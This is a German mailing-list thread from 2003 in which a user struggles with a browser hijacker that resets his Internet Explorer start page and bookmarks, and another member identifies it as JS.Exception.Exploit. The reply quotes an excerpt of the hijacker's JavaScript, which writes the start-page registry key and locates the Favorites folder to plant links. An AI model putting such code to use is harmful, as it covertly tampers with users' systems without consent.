Ich glaube das Du dem Virus (kein ausgewachsener) JS.Exception.Exploit erlegen bist.
JS.Exception.Exploit besteht aus einem JavaScript das in eine Webseite eingebunden
wird. Sobald
ein Besucher diese Webseite aufruft wird per JavaScript in seiner Registry ein Wert
gesetzt.
Dieser wird auch der Auto BookMark genannt. Auf Pornoseiten sehr beliebt ;-).
Ergo besorge Dir erstmal einen Virenscaner, jeder scaner kennt diesen Trick und suche
bei Symantec oder McAffe nach JS.Exception.Exploit.
Charles
<auszug code>
//set home page
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
"http://www.PORNO.com";);
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
//end set home page
//add favorites this is the common part; should be here if you want to add favorites
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";
if(!FSO.FolderExists(loc))
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName +
"\\Favorites";
if(!FSO.FolderExists(loc))
return;
</auszug code>
// -----Urspr�ngliche Nachricht-----
// Von: [EMAIL PROTECTED]
// [mailto:[EMAIL PROTECTED] Im Auftrag von
// Patrick Maier
// Gesendet: Donnerstag, 25. September 2003 18:43
// An: [EMAIL PROTECTED]
// Betreff: Re[2]: [Coffeehouse] unendlich peinliches Problem...
//
//
// Ich hab das elende Mistst�ck!
// Im Windows-Verzeichnis (welches eigentlich nicht mein System
// beinhaltet) liegt eine "winamp.hta" die aus einem
// ziemlichen simplen VBS Script besteht... Aufgerufen wird
// das Teil aus der Registry - bloss war ich zu bl�d die
// unpassende .hta zu erkennen.
//
// Soviel nur zur Info falls mal jemand wieder so ein Teil
// haben sollte.
//
// greetz
// Patrick
//
// > Sieh mal nach, ob es bei Dir im Autostart oder auf der
// Festplatte c:\
// > einen
// > neuen Ordner oder eine Verkn�pfung gibt die beim Neustart
// ausgef�hrt wird.
// > Anderes kann ich mir nicht vorstellen. Es mu� auf jeden
// fall eine XYZ.exe
// > Datei sein. Diese werden zu 90% auf die Festplatte
// kopiert und es wird im
// > Autostart eine Verkn�pfung auf diese Datei gemacht.
//
// > Patrick Maier schrieb:
//
// >> Tja danke f�r die Vorschl�ge so far, aber so einfach ist's denn
// >> nicht. Das Zeug bei den Internetoptionen resp. in der Registry
// >> rausnehmen hab ich schon probiert - ist alles beim
// n�chsten Neustart
// >> wieder da (inkl. gel�schter Bookmarks u. einem Link am Desktop).
// >> Dialler ist' offenbar auch keiner vorhanden - zumal
// mich sowas bei
// >> Kabelmodem recht kalt
// >> l�sst; und den IE gegen Mozilla tauschen... naja, wie die meisten
// >> brauch ich auch den IE zum Entwickeln :(
// >>
// >>
//
// _______________________________________________
// Coffeehouse mailing list
// [EMAIL PROTECTED]
// // http://www.glengamoi.com/mailman/listinfo/coffeehouse
//
//
_______________________________________________
Coffeehouse mailing list
[EMAIL PROTECTED]
http://www.glengamoi.com/mailman/listinfo/coffeehouse
